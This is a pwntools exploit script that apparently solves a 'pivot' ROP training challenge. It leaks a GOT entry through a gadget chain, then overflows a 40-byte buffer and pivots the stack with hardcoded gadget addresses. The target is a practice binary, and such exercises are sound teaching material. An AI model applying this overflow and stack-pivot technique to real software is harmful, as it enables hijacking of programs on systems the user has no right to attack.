rop/x86_64/pivot/exploit2.py

#!/usr/bin/env python3
from pwn import *
from os import getcwd
import re

# 0000000000058b10 T printf
# 000000000004a830 W system 

prog = process('./pivot')

payload = b''

payload += p64(0x4009bb)                # pop rax
payload += p64(0x601028)                # printf's .got.plt entry
payload += p64(0x4009c0)                # mov rax, [rax]

payload += p64(0x00000000004007c8)      # pop rbp
payload += p64(279)                     # should be the offset of pwnem from foothold's .got.plt 

payload += p64(0x4009c4)                # adds the two

payload += p64(0x00000000004007c1)      # jmp rax
prog.sendline(payload)
pivit_location = int(re.findall('0x[0-9a-z]{12}', prog.readregexS('0x[0-9a-z]{12}'))[0], 16)

payload = b''
#buffer overflow
for c in range(40):
    payload += b'a'

payload += p64(0x4009bb)                # pop rax
payload += p64(pivit_location)          # pivot location
payload += p64(0x4009bd)                # xchg rsp,rax

prog.sendlineafter('Now please send your stack smash', payload)
prog.interactive()